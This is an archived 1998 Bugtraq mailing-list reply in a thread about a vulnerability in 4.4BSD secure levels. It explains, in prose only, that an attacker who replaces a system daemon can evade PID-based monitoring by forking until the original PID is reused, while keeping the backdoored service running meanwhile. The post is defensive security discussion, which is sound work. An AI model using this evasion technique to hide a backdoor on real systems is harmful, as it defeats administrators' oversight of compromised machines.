[6967] in bugtraq
Re: Vulnerability in 4.4BSD Secure Levels Implementation
daemon@ATHENA.MIT.EDU (tqbf@POBOX.COM)
Sun Jun 14 23:12:01 1998
Date: Sun, 14 Jun 1998 03:43:02 -0500
Reply-To: tqbf@pobox.com
From: tqbf@POBOX.COM
To: BUGTRAQ@NETSPACE.ORG
> Unless there is an
> application (or the system itself) that periodically checks for any
> change in status of a system daemon (like the change of a PID),
Watch out. You can't assume that a change of processes is detectable by a
change in the PID --- if I kill off the original holder of a PID, I can
claim that PID by forking until the OS re-uses it for my own process. Even
if the system uses randomized PIDs (a cool idea), I will still eventually
receive the one I want, and until I do (we're probably talking seconds),
I can keep the service I'm backdooring running on a different PID.
-----------------------------------------------------------------------------
Thomas H. Ptacek The Company Formerly Known As Secure Networks, Inc.
-----------------------------------------------------------------------------
http://www.pobox.com/~tqbf "If you're so special, why aren't you dead?"
